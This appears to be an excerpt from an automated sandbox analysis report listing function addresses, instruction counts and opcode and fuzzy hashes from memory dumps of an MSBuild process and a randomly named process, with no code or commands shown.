                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 80eb75540583fb08b3e42041dacfecce49f308e0fdaf35fcb028735b3caf9045
                                                                                                                                        • Instruction ID: 6709c3d6dfdf1db55495feec20604ce2991860ebcfc05ea3ce64e4095dc5d11e
                                                                                                                                        • Opcode Fuzzy Hash: 80eb75540583fb08b3e42041dacfecce49f308e0fdaf35fcb028735b3caf9045
                                                                                                                                        • Instruction Fuzzy Hash: 42E0C936B001259B8FC4EBB8D85859CB3F1ABC91217408865D61AE7354DE389C128BA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067DF401 Relevance: .0, Instructions: 25COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 51d0bbcd217ce9053ebda1569a53313a5c29e471223d8ea1a0c11c3dac201f99
                                                                                                                                        • Instruction ID: 7d83064f4b773d48c050a07d3b4b0b1ad6e5f3e06c7c59cdaadc66f076521649
                                                                                                                                        • Opcode Fuzzy Hash: 51d0bbcd217ce9053ebda1569a53313a5c29e471223d8ea1a0c11c3dac201f99
                                                                                                                                        • Instruction Fuzzy Hash: 5CF0A539B50118CFCF44EBA8E95D5ACBBF2FB883127018565EA0AE7354DF389C118B50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 067D51E8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.530939272.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_67d0000_MSBuild.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6908e65c5fdbb54b41c5b155d1bb383b59142d4f75401e8972883f24baae3987
                                                                                                                                        • Instruction ID: 34a62ab703b91c1b24dea5aebfec5195cd39c112a2f0f5a624f50ec37e0230a5
                                                                                                                                        • Opcode Fuzzy Hash: 6908e65c5fdbb54b41c5b155d1bb383b59142d4f75401e8972883f24baae3987
                                                                                                                                        • Instruction Fuzzy Hash: B2E012B1E001199F4B90DBAD98056AE7BF9FA88611B15457AE51DD3200EA7049158BD1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00D12370 Relevance: 2.0, Instructions: 2012COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d82ee4b48cfde0563735894d0e24a9adce20db8bda0d2a0b74e2da7a7564d9bb
                                                                                                                                        • Instruction ID: f30535cc3e9efcfa5309a1bbd46251c4e03a715eada6db9e85f766c14a64cbdf
                                                                                                                                        • Opcode Fuzzy Hash: d82ee4b48cfde0563735894d0e24a9adce20db8bda0d2a0b74e2da7a7564d9bb
                                                                                                                                        • Instruction Fuzzy Hash: 7903B131A006499BDB21EF20DC40BADB3B6EFD8304F568694E6087B295CF74AE95CF51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D128A9 Relevance: 1.6, Instructions: 1591COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9f749c56ef0c05773939db59ca7ff6518974e1abfbe89eba64bb7428f519c413
                                                                                                                                        • Instruction ID: f7b6e79f4ecc048ee6e8ad7b8dc3b5e257d43e5ecb923bdda2ba71863f47448d
                                                                                                                                        • Opcode Fuzzy Hash: 9f749c56ef0c05773939db59ca7ff6518974e1abfbe89eba64bb7428f519c413
                                                                                                                                        • Instruction Fuzzy Hash: 19E2AE31A006599BDB21EF20CC40BDDB376EFD8704F568694E6087B294CFB46AD5CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D118C0 Relevance: .5, Instructions: 479COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 685356f863ac2fef9aa28c4d9dde775ed9c563813c7161ffbf9085559d0ab72a
                                                                                                                                        • Instruction ID: a5d2bd5f8fe2aed8d6b988ac0a8179756c46956edee878e43480177298e83ccc
                                                                                                                                        • Opcode Fuzzy Hash: 685356f863ac2fef9aa28c4d9dde775ed9c563813c7161ffbf9085559d0ab72a
                                                                                                                                        • Instruction Fuzzy Hash: 9C02F438A042069FCB15DFA4D490BAEBBF2FF85300F1881A9D515DB2A5DB34DD81CBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D151F9 Relevance: .4, Instructions: 436COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cb8f8efd2630f491128af1b9c5ab6990d068d38716f5cb60fbdeed631e809aee
                                                                                                                                        • Instruction ID: 97ae36c15581338eb89d62e7e84001b72ae43acf1a1f4f93ffe11d08bbeb580e
                                                                                                                                        • Opcode Fuzzy Hash: cb8f8efd2630f491128af1b9c5ab6990d068d38716f5cb60fbdeed631e809aee
                                                                                                                                        • Instruction Fuzzy Hash: BFF1A030A00605DFDB24DF64E855BAEB7F3AF85304F188469D4169B299DF78EC81CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D14450 Relevance: .2, Instructions: 224COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 74fda064c878b4460efdddf8684f41c26a72028938b4562c70c6382db4f1ec82
                                                                                                                                        • Instruction ID: cf4d4a26718af180729bd72b8604be3d755cbe0dfa6d857db1ce7a83ba340bc9
                                                                                                                                        • Opcode Fuzzy Hash: 74fda064c878b4460efdddf8684f41c26a72028938b4562c70c6382db4f1ec82
                                                                                                                                        • Instruction Fuzzy Hash: 89A18B302046459FC715DF28D8C4EA9BBF2EF42344B4AC9A9D0498F666DB34FD94CBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D10C62 Relevance: .2, Instructions: 220COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 29f2e3b6d2f400ad6aeb582d46f46e5ca6e973373ca6a964e45e48031571324d
                                                                                                                                        • Instruction ID: eaf7883f4832242ac30be47598dc8dad4bc3da99d962c8099d8422c659f39700
                                                                                                                                        • Opcode Fuzzy Hash: 29f2e3b6d2f400ad6aeb582d46f46e5ca6e973373ca6a964e45e48031571324d
                                                                                                                                        • Instruction Fuzzy Hash: 4C917371E046089FCB15EFE1D850AEEBBFAEF48700F14852AE505AB264DF749945CFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D155E0 Relevance: .2, Instructions: 182COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1004cec87e45de4b3249ef056b600959b6f800dc9ba2b224b0547ac2192250ef
                                                                                                                                        • Instruction ID: 21a8c1279e6a53db97ac79070d4a7580f7098a0c4c39fd74cba696234780f3c9
                                                                                                                                        • Opcode Fuzzy Hash: 1004cec87e45de4b3249ef056b600959b6f800dc9ba2b224b0547ac2192250ef
                                                                                                                                        • Instruction Fuzzy Hash: 34619131B04614EFCB14DF64E895BAEBBF2EF89700F158065E905EB295DB789C41CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D113C8 Relevance: .2, Instructions: 158COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bb0e1ce337331f31323305c6b926e0430f5d4c940301298a120757f5900a033c
                                                                                                                                        • Instruction ID: edd89d6bca6e0adaa4f0483f8656a7fab62b359832f2b76efef0fde6e660eb03
                                                                                                                                        • Opcode Fuzzy Hash: bb0e1ce337331f31323305c6b926e0430f5d4c940301298a120757f5900a033c
                                                                                                                                        • Instruction Fuzzy Hash: 0B510335E04259AFCB14EBB598142EEBBF2EFC5300F04C0BAD519D7251EB344A06CBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D10448 Relevance: .1, Instructions: 115COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b6a1818173c0de747daa1a1d9943836255f92fe2d672925489001be6293e3ede
                                                                                                                                        • Instruction ID: 77a172a46e5d8b0ec5c5c44d67e1d9b71accc0047d993579960fb336b5e889c3
                                                                                                                                        • Opcode Fuzzy Hash: b6a1818173c0de747daa1a1d9943836255f92fe2d672925489001be6293e3ede
                                                                                                                                        • Instruction Fuzzy Hash: E741D030A042489FCB54EFB8E455B9DBBF2AF85344F05846AD108AF3A5EF788D45CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D118B0 Relevance: .1, Instructions: 105COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: decf5d46916db71aa494b9c589803818959492704212e1f03654e9fd94fd6a4e
                                                                                                                                        • Instruction ID: 3c3f9d010aa818f32514fdfcabbda94a14fcc9a583e26b75d4aa2a849682e028
                                                                                                                                        • Opcode Fuzzy Hash: decf5d46916db71aa494b9c589803818959492704212e1f03654e9fd94fd6a4e
                                                                                                                                        • Instruction Fuzzy Hash: 4841FE34A042449FCB15DF74E854AAD7BF2EF89300B0581AAE519DB3B5DB309D45CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D12360 Relevance: .1, Instructions: 81COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 78a6af8e3062d0df3a9e7ced96bb5218fb874cc5c2d52ee74a3db3b659b8b4b1
                                                                                                                                        • Instruction ID: c365e905848a4d347f1b2c8ed298d67b41b6d53834a11e29fe29fb54b60b6c4c
                                                                                                                                        • Opcode Fuzzy Hash: 78a6af8e3062d0df3a9e7ced96bb5218fb874cc5c2d52ee74a3db3b659b8b4b1
                                                                                                                                        • Instruction Fuzzy Hash: 1431C131604200EFD7249F25E8447FA7BE2AF45301F0944AAE856CB2A2DB39CC94CB71
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D11768 Relevance: .1, Instructions: 77COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3a47b56223f50754b24d6254be6ef05bf56d7d64e48b7ca3037cbf053f1dbeca
                                                                                                                                        • Instruction ID: abee792df70918b74c20194d7d37dc05985b791c15da3f31860345ca4337a1ae
                                                                                                                                        • Opcode Fuzzy Hash: 3a47b56223f50754b24d6254be6ef05bf56d7d64e48b7ca3037cbf053f1dbeca
                                                                                                                                        • Instruction Fuzzy Hash: 75318975B002119FC748EB78D4589AE7BF1AF49308B2144A9E506DF3B2EB35DD42CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D10439 Relevance: .1, Instructions: 76COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6a989f339cd6893cb6cd5c68630920f9711620a3cc4001f8d16264a34bf3bba6
                                                                                                                                        • Instruction ID: d1004840c77c7fc01fa462550a85794af39387a27a7016198bce44d1bfb4ff44
                                                                                                                                        • Opcode Fuzzy Hash: 6a989f339cd6893cb6cd5c68630920f9711620a3cc4001f8d16264a34bf3bba6
                                                                                                                                        • Instruction Fuzzy Hash: BE31C4309046489FCB11FFA4E494B9DBBF2AF84344F048469E008AF265DB789889CFA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D11778 Relevance: .1, Instructions: 69COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e13f94bd7e5f195cd2355d93f6c1e552539de9c9335f162e9a085cf16f6256c1
                                                                                                                                        • Instruction ID: 19f1d77738abd23024a35630c56a00368856500ef269db19b7c7fb90c95fd303
                                                                                                                                        • Opcode Fuzzy Hash: e13f94bd7e5f195cd2355d93f6c1e552539de9c9335f162e9a085cf16f6256c1
                                                                                                                                        • Instruction Fuzzy Hash: 5C215735B002119FCB48EB78D4559AE77F1AF48708B2084A9E506DB3B1EF39DD41CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D15819 Relevance: .1, Instructions: 67COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e3ef32f71f0ad8260428f1c51bdcec14ac260bc90894bc775142424a651ebd4e
                                                                                                                                        • Instruction ID: 0bac5cb786e4c9dffb4b64c4c393c38801f1c7fa4c8ac0c0617ae7d6656ba668
                                                                                                                                        • Opcode Fuzzy Hash: e3ef32f71f0ad8260428f1c51bdcec14ac260bc90894bc775142424a651ebd4e
                                                                                                                                        • Instruction Fuzzy Hash: 82110431A192849FC7129B74AC156AE7FB5DFC6214F0940E7D048DB292CA340C09C7B1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D14B2A Relevance: .1, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5d7f32893bd03d74aba7595dfdef03736be54af4b8ed57a526e6d2e1e9ff9bc5
                                                                                                                                        • Instruction ID: a409682a4954c8bef582345cd956d9fdf6da0a932c1915b91ba862cf9a48a37a
                                                                                                                                        • Opcode Fuzzy Hash: 5d7f32893bd03d74aba7595dfdef03736be54af4b8ed57a526e6d2e1e9ff9bc5
                                                                                                                                        • Instruction Fuzzy Hash: FB11A974A0C204ABDB14EBB2D6517EE7BF2AB89704F084129D405BB284DF748D84CBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D14B30 Relevance: .1, Instructions: 56COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: fc9f613e3d806b01a4325b09e3d3b14e9df809ab7a93ef0865689b322adc37ea
                                                                                                                                        • Instruction ID: 782745f49c02e9baff9d1a7f8403a982bb5d029266345f9c9231ef5da8425a09
                                                                                                                                        • Opcode Fuzzy Hash: fc9f613e3d806b01a4325b09e3d3b14e9df809ab7a93ef0865689b322adc37ea
                                                                                                                                        • Instruction Fuzzy Hash: DA11BB34A0C209ABDB14EBB2D6517EE76F6AB89708F044028D401BB284DF789D84CBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D10699 Relevance: .0, Instructions: 40COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8afc862e8e81ba1d813e1a6d285f864d397ee16ae8584b34274d1994efa8203f
                                                                                                                                        • Instruction ID: 5fb92bc42128292bf16f20e952fd9afa23b2f6db305d94a84bac126dee2832fb
                                                                                                                                        • Opcode Fuzzy Hash: 8afc862e8e81ba1d813e1a6d285f864d397ee16ae8584b34274d1994efa8203f
                                                                                                                                        • Instruction Fuzzy Hash: 6201D1217097806FEB257775B82579E3F915B52754F0804BAE982CB2F6DFA88C80C7B0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D15770 Relevance: .0, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bc4b6d151e0cbf6de5b6809e8653aa1861eb4fa7395736f6e5bddbbdc166e54b
                                                                                                                                        • Instruction ID: 481e55e0e8a3cebe8b4699d8d226cbcacc2b02694982d372f270ad3c39f81b88
                                                                                                                                        • Opcode Fuzzy Hash: bc4b6d151e0cbf6de5b6809e8653aa1861eb4fa7395736f6e5bddbbdc166e54b
                                                                                                                                        • Instruction Fuzzy Hash: 08F0C232704610AFD3116B39A895B7E3B95EFCA765B054468E449CB2A0CE75CC01D7B0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D14D21 Relevance: .0, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3f3f57423b21e9beff68005809480ab73356e2cfdfa1331c78a3f16d5437bc34
                                                                                                                                        • Instruction ID: a09b821b9026ff3157b159bb99258f5396ee60deed63c17eab9b15590e6d5186
                                                                                                                                        • Opcode Fuzzy Hash: 3f3f57423b21e9beff68005809480ab73356e2cfdfa1331c78a3f16d5437bc34
                                                                                                                                        • Instruction Fuzzy Hash: 25F0B4312082805FC3119B35DC64A5EBFA6EFCA211B0581BAE549CB2A6CEB48C05C761
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D106A8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 83ed5563e9aad741c26589faf548c6141433a0c23a7a336fe247a327390cdb65
                                                                                                                                        • Instruction ID: 84c7d4c23c49a52276edfc792c3dea8091fb298bea40638b5b5edde0af83239d
                                                                                                                                        • Opcode Fuzzy Hash: 83ed5563e9aad741c26589faf548c6141433a0c23a7a336fe247a327390cdb65
                                                                                                                                        • Instruction Fuzzy Hash: FDF090317056455BCB78B775B8257AE3A956B94B54F040439E942C72E4DFF8CC8087E0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D14D30 Relevance: .0, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e2d212f6fbd5b9d5222cbd00ba5b1cc52e96f24fb05649752f8e4860e820d91a
                                                                                                                                        • Instruction ID: 08ab9739a02ad56a773c43b3fb8b3eac3e387e7f7c21f370359cec5b5dd4e660
                                                                                                                                        • Opcode Fuzzy Hash: e2d212f6fbd5b9d5222cbd00ba5b1cc52e96f24fb05649752f8e4860e820d91a
                                                                                                                                        • Instruction Fuzzy Hash: 4CE09B313001005BC314EF2AE854E5EF7AAEFCD2117518139E50AD7325DEB09C458BA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D10FB0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000E.00000002.361359389.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_14_2_d10000_ykVBUY.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a6651873532581ea18196c7c78b1742e8c54ec52e173976234832f1011778b1b
                                                                                                                                        • Instruction ID: 793d17bb1b78f6271e7e8129a542a5ae7359597799319bdeee69a1bd330fe75b
                                                                                                                                        • Opcode Fuzzy Hash: a6651873532581ea18196c7c78b1742e8c54ec52e173976234832f1011778b1b
                                                                                                                                        • Instruction Fuzzy Hash: 18F017B8640201CFCB14EF70E199AACB7B2EF48308F2044A9E50A9B3A5CF79D845CF11
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00D10B28 Relevance: .0, Instructions: 24COMMON
